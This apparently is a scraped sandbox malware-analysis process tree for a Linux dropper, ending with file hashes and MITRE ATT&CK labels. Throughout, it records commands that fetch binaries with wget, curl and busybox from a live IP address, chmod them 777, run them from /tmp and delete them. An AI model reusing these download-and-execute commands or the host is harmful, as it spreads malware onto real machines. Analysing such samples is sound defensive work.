/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:946
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:952
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:958
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:962
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97